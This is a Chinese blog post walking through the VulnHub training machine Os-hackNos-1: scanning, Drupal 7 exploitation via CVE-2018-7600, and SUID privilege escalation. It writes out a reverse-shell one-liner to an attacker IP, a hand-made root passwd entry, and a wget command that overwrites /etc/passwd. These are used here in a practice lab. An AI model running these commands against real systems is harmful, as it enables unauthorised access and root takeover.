首页 > 其他分享 >靶场VNH练习(2)Os-hackNos-1

靶场VNH练习(2)Os-hackNos-1

时间:2022-10-10 11:34:48浏览次数:87  
标签:passwd Os hackNos VNH sun 权限 root bash

靶场名称:Os-hackNos-1
难度:简单
下载链接:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

环境搭建

image.png
下一步使用虚拟机(vm)打开镜像
image.png
这里如果没有ip 的话参考
https://www.yuque.com/docs/share/76c0f057-3a94-40dd-b17d-7d9c02c59129?# 《Vulnhub靶机检测不到IP》
image.png

WEB渗透

image.png
*80和22端口开着,一个ssh远程连接一个web服务

打开80端口查看,发现是ubuntu的默认网页
image.png
image.png
扫描目录(这里用的dirsreach默认字典,也可以-w 路径 指定字典)
image.png
image.png
一开始再纠结james漏洞,发现存在任意命令执行,不过需要知道账户密码
后来查看了一下指纹信息
image.png
发现是drupal框架,寻找有无可利用漏洞,这里是drupal7 版本
这里从github上下载exp工具使用:https://github.com/pimps/CVE-2018-7600
image.png
image.png
这里尝试利用任意代码执行反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.50.164/20888 <&1'

image.png

提权

通过命令查看系统版本和内核信息

uname -a
lsb_release -a

image.png
image.png
这里可以远程建一个http服务,用Wget下载,但无执行权限,想办法赋予权限或者采用其他方法

SUID提权

这里查看一下suid权限

find / -perm -u=s -type f 2>/dev/null

image.png
这里发现wget拥有root权限,可以用wget下载替换文件
替换/etc/passwd

在kali上生成密码
openssl passwd ‐1 ‐salt 'sun' 123456
创建文件passwd 把 写入summer 为root权限
vim passwd
复制粘贴原来的passwd
加入summer
sun:$1$sun$Rf54ApPQD/7saC.SbX/OQ.:0:0:root:/root:/bin/bash
下载替换/etc/passwd
wget http://192.168.50.164:10888/passwd -O /etc/passwd

image.png
image.png
image.png
image.png
image.png

//python 实现交互shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

image.png
image.png
image.png

标签:passwd,Os,hackNos,VNH,sun,权限,root,bash
From: https://www.cnblogs.com/Summer-123/p/16775043.html

相关文章

  • Docker容器no route to host解决
    在使用Centos7上使用docker容器访问其他服务器的的端口时,发现容器无法访问外部服务器的端口,却可以ping通外部服务器的地址。其中Centos7中的防火墙也是关的,经过发现docker......
  • Boosting, Bootstrap, Adaboost, GBDT, XGBoost, 随机森林
     Adaboost,按分类对错,分配不同的weight,计算cost function时使用这些weight,从而让“错分的样本权重越来越大,使它们更被重视”。Bootstrap也有类似思想,它在每一步迭代时不......
  • Idea中连接HugeGraph服务器出现NoSuchFieldError: EXCLUDE_EMPTY
    1、发生错误场景(开发环境)importjava.io.IOException;importjava.util.Iterator;importjava.util.List;importjava.util.Map;importcom.baidu.hugegraph.driver......
  • 6.Get和Post
    1.Get和Post目录什么是Get,什么是PostGet和Post的区别和联系两者如何传参 2.Get和Post URL是一个资源描述符,一个URL用于描述一个网上资源概念:Get用于获取/......
  • centos7 中安装java8
     使用yum安装001、查看安装包[root@localhosttest]#cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)  002、查看java8安装包[root@localho......
  • centos7.6 安装Tomcat-8.5.39的方法
    下面给大家介绍centos7.6安装Tomcat-8.5.39的方法,具体内容如下所示: #关闭防火墙systemctlstopfirewalld.servicesystemctldisablefirewalldsetenforce0sed-......
  • Nacos
    Nacos 是阿里提供的用于微服务的一套集注册中心、配置中心以及消息总线为一体的技术。nacos也是BS结构,服务端在本机启动。服务中引入对应的依赖、配置、以及启动注解即......
  • position
    position最常用的值有:静态定位——static相对定位——relative绝对定位——absolute固定定位——fixed1、static(静态):HTML元素的默认值,不受top、bottom、left、right属......
  • Vue3使用axios
    如何在Vue项目中使用axios请求http://www.45fan.com/article.php?aid=1D82KNnQB62JUc6OVue3-使用axios发起网络请求https://blog.csdn.net/liuyuxin36/article/details/......
  • axios取消上一个请求
      链接,里面有效果,亲测有效果https://codesandbox.io/s/simple-example-of-cancelling-axios-request-kyrnc?file=/src/App.vue:1074-1096这个可能需要外网才能打开,要......